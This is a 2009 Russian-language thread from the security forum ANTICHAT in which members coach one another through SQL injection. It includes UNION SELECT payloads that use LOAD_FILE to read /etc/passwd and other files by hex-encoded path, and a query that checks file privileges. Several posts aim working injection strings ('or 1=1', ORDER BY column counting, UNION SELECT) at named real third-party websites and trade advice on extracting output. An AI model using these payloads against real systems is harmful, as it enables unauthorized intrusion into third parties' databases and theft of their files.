HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 25.01.2009, 21:20
Jokester
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

kevmen
ПУТЬ ДО ФАЙЛА, об этом ВЕЗДЕ написано !!!!

Ты говорил , что читаешь это
https://forum.antichat.ru/thread43966.html

, так вот оттуда выдержка:
Цитата:
Рассмотрим функцию LOAD_FILE

Пример: http://xxx/news.php?id=-1' UNION SELECT 1,2,LOAD_FILE('etc/passwd'),4,5,6;

Для нее есть также несколько ограничений.
Должен быть указан полный путь к файлу.
 
Ответить с цитированием

  #2  
Старый 25.01.2009, 21:59
kevmen
Участник форума
Регистрация: 29.10.2008
Сообщений: 165
Провел на форуме:
397889

Репутация: 60
По умолчанию

Цитата:
Сообщение от jokester  
kevmen
ПУТЬ ДО ФАЙЛА, об этом ВЕЗДЕ написано !!!!

Ты говорил , что читаешь это
https://forum.antichat.ru/thread43966.html

, так вот оттуда выдержка:
я до этого еще не дошел,сейчас читаю
https://forum.antichat.ru/threadnav34338-1-10.html
 
Ответить с цитированием

  #3  
Старый 25.01.2009, 21:30
.Slip
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
Провел на форуме:
21768337

Репутация: 3486


По умолчанию

kevmen,
user()
==>
select file_priv from mysql.user where user = blablabla

@localhost не пиши в юзнейме
__________________
..
 
Ответить с цитированием

  #4  
Старый 25.01.2009, 21:56
kevmen
Участник форума
Регистрация: 29.10.2008
Сообщений: 165
Провел на форуме:
397889

Репутация: 60
По умолчанию

jokester,спасибо)получилось,опять невнимательность)
http://localhost/view_cat.php?cat=1+union+select+1,2,LOAD_FILE(0x5a 3a5c686f6d655c6c6f63616c686f73745c7777775c7363686f 6f6c5c766965775f6361742e706870),4,5,6,7,8,9
 
Ответить с цитированием

  #5  
Старый 25.01.2009, 22:03
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552

Репутация: 568
По умолчанию

Цитата:
http://www.mormontimes.com/mormon_voices/?id=3237+or+1=1
http://www.wiser.pitt.edu/apps/news/viewArticle.asp?article_id=68+or+1=1/*
что думаете?
 
Ответить с цитированием

  #6  
Старый 25.01.2009, 23:02
l1ght
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
Провел на форуме:
14023893

Репутация: 2163
По умолчанию

Цитата:
Сообщение от sabe  
что думаете?
первая )+order+by+32--+
вторая не открывается
 
Ответить с цитированием

  #7  
Старый 25.01.2009, 23:38
kevmen
Участник форума
Регистрация: 29.10.2008
Сообщений: 165
Провел на форуме:
397889

Репутация: 60
По умолчанию

http://www.mormontimes.com/mormon_voices/?id=3237+union+select+1,2,3,4,5,6,7,8,9,10,11,12,1 3,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29, 30,31,32

я так понял стоит фильтрация на union?
 
Ответить с цитированием

  #8  
Старый 25.01.2009, 23:47
R1dex
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865

Репутация: 571
По умолчанию

Код:
http://www.mormontimes.com/mormon_voices/?id=3237)+union+select+1,2,3,4,5,6,7,8,9,10,11,12,1 3,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29, 30,31,32--+
Чтобы увидеть вывод: =-3237)+union...
 
Ответить с цитированием

  #9  
Старый 25.01.2009, 23:54
KranC
Новичок
Регистрация: 25.01.2009
Сообщений: 1
Провел на форуме:
7283

Репутация: 0
По умолчанию

с чего ты взял что там 32 поля?

+order+by+ - не прокатывает
+union+ - вроде как отключен
 
Ответить с цитированием

  #10  
Старый 25.01.2009, 23:57
R1dex
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865

Репутация: 571
По умолчанию

Цитата:
Сообщение от KranC  
с чего ты взял что там 32 поля?

+order+by+ - не прокатывает
+union+ - вроде как отключен
Код:
http://www.mormontimes.com/mormon_voices/?id=3237)+order+by+32--+
Читайте внимательнее, сверху же l1ght написал....

Что значит "union отключен"? )))
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.